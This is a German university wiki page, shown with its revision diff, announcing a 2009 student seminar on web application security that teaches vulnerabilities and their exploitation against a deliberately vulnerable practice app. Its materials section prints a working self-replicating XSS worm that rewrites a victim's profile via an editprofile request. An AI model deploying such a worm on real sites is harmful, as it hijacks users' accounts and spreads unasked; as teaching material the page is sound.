KunterBuntesSeminar-SS09/(Un)Sicherheit in Webanwendungen: Unterschied zwischen den Versionen
(Die Seite wurde neu angelegt: Das ist der 5. Termin vom KunterBuntesSeminar-SS09 = Abstract = FIXME = Seminarvortrag = FIXME (nach dem Seminar) == Vortragende == Henning (8pridoeh): Fragen z...) |
(section "seminarvortrag" entfernt) |
||
| (5 dazwischenliegende Versionen von 4 Benutzern werden nicht angezeigt) | |||
| Zeile 2: | Zeile 2: | ||
= Abstract = | = Abstract = | ||
Ich möchte euch die Grundlagen der Sicherheit in Webanwendungen erläutern und dabei typische Schwachstellen aufzeigen. Es wird darum gehen, wie man diese verhindert, aber auch ausnutzen kann. Das Ausnutzen der Schwachstellen werden wir interaktiv an einer präparierten Webanwendung üben um so das Gelernte zu festigen. Der Vortrag wird ein wenig PHP-lastig sein, dieses ist zwei Umständen geschuldet: Erstens sind die meisten Webanwendungen in PHP geschrieben und zweitens macht PHP es den Programmierern sehr leicht sich selbst ins Knie zu schiessen. | |||
Auch wenn du keine Vorkenntnisse hast und dir Begriffe wie "PHP", "HTTP" oder "SQL" nichts sagen, keine Panik, es wird alles von 0 an erklärt. | |||
== Vortragende == | == Vortragende == | ||
| Zeile 13: | Zeile 11: | ||
= Folien/Material = | = Folien/Material = | ||
Folien: [[Bild:Sicherheit in webapplikationen.pdf]] | |||
Präparierte Webanwendung: [[Bild:Stasivz.tar.gz]] | |||
XSS-Wurm: <pre>hacked<script>(function(){a=new XMLHttpRequest(); | |||
a.open('POST','index.php?page=editprofile',true); | |||
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); | |||
a.send('change_profile=1&movie=hacked<script>('. | |||
concat(escape(arguments.callee.toString().concat(')();</scr'). | |||
concat('ipt>')))); })();</script></pre> | |||
(Zeilenumbrüche vorher entfernen) | |||
= Weiterführende Links = | = Weiterführende Links = | ||
Firefox-Addons: | |||
* [https://addons.mozilla.org/en-US/firefox/addon/60 Web Developers Toolbar] | |||
* [https://addons.mozilla.org/en-US/firefox/addon/966 Tamper Data] | |||
* [https://addons.mozilla.org/de/firefox/addon/3899 Hackbar] | |||
* [https://addons.mozilla.org/de/firefox/addon/3829 Live HTTP Headers] | |||
Cheat Sheets: | |||
* [http://ha.ckers.org/xss.html XSS Cheat Sheet] | |||
* [http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ SQL Injection Cheat Sheet] | |||
[[Kategorie:KunterBuntesSeminar]] | [[Kategorie:KunterBuntesSeminar]] | ||
Aktuelle Version vom 20. November 2009, 00:47 Uhr
Das ist der 5. Termin vom KunterBuntesSeminar-SS09
Abstract[Bearbeiten]
Ich möchte euch die Grundlagen der Sicherheit in Webanwendungen erläutern und dabei typische Schwachstellen aufzeigen. Es wird darum gehen, wie man diese verhindert, aber auch ausnutzen kann. Das Ausnutzen der Schwachstellen werden wir interaktiv an einer präparierten Webanwendung üben um so das Gelernte zu festigen. Der Vortrag wird ein wenig PHP-lastig sein, dieses ist zwei Umständen geschuldet: Erstens sind die meisten Webanwendungen in PHP geschrieben und zweitens macht PHP es den Programmierern sehr leicht sich selbst ins Knie zu schiessen.
Auch wenn du keine Vorkenntnisse hast und dir Begriffe wie "PHP", "HTTP" oder "SQL" nichts sagen, keine Panik, es wird alles von 0 an erklärt.
Vortragende[Bearbeiten]
Henning (8pridoeh): Fragen zum Thema beantworte ich gerne. Ihr findet mich hin und wieder im c.t. oder anderswo in der Gegend.
Folien/Material[Bearbeiten]
Folien: Datei:Sicherheit in webapplikationen.pdf
Präparierte Webanwendung: Datei:Stasivz.tar.gz
XSS-Wurm:
hacked<script>(function(){a=new XMLHttpRequest();
a.open('POST','index.php?page=editprofile',true);
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
a.send('change_profile=1&movie=hacked<script>('.
concat(escape(arguments.callee.toString().concat(')();</scr').
concat('ipt>')))); })();</script>
(Zeilenumbrüche vorher entfernen)
Weiterführende Links[Bearbeiten]
Firefox-Addons:
Cheat Sheets: